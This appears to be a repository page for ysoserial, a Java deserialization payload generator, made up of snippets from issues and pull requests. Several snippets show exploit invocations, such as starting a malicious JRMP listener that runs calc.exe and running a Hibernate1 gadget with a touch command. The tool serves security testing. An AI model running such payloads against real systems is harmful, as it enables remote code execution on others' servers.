ysoserial
ysoserial copied to clipboard
frohoff
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
Project should be refactored to allow gadgets/chains to be generated (and unit tested) with only exactly the exact required dependencies and versions, even in cases where two different gadgets/chains require...
Fix insecure test RMI registry connection and upgrade to SSL connection if it fails. https://github.com/frohoff/ysoserial/issues/171
Using RMIRegistryExploit to exploit a malicious rmi registry may lead to rce on client. ### Demo First,start a malicious registry: ```bash java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 calc.exe ``` and...
The serialized data generated by `BeanShell1` contains the path to run ysoserial, and these paths often contain the username of the current user. This means that using this gadget will...
Adding a maven profile option to compile with Hibernate 5.3.11, example: `mvn clean package -DskipTests -Dhibernate5.3.11` Exploiting hibernate 5 works just as before: `java -Dhibernate5 -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar Hibernate1 "touch /tmp/ysoserial"`
step to reproduce: 1. git clone 2. mvn clean package -DskipTests tested on: 1. wsl2, with oracle jdk8 2. kali 2020 vm, openjdk version "11.0.6" 2020-01-14 errors: ```shell michael@DESKTOP-HE0BL7H:/mnt/d/tools/ysoserial/target$ java...
+ Allow formatTable function to wrap long lines in columns + Allow users to specify terminal width used by formatTable with terminalWidth command line property + Fix display of dependencies...
Potential fix for #71 I have upgraded the TemplatesImpl exploit using Runtime.exec(String[]).
More complete and cross-platform version of #60 http://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html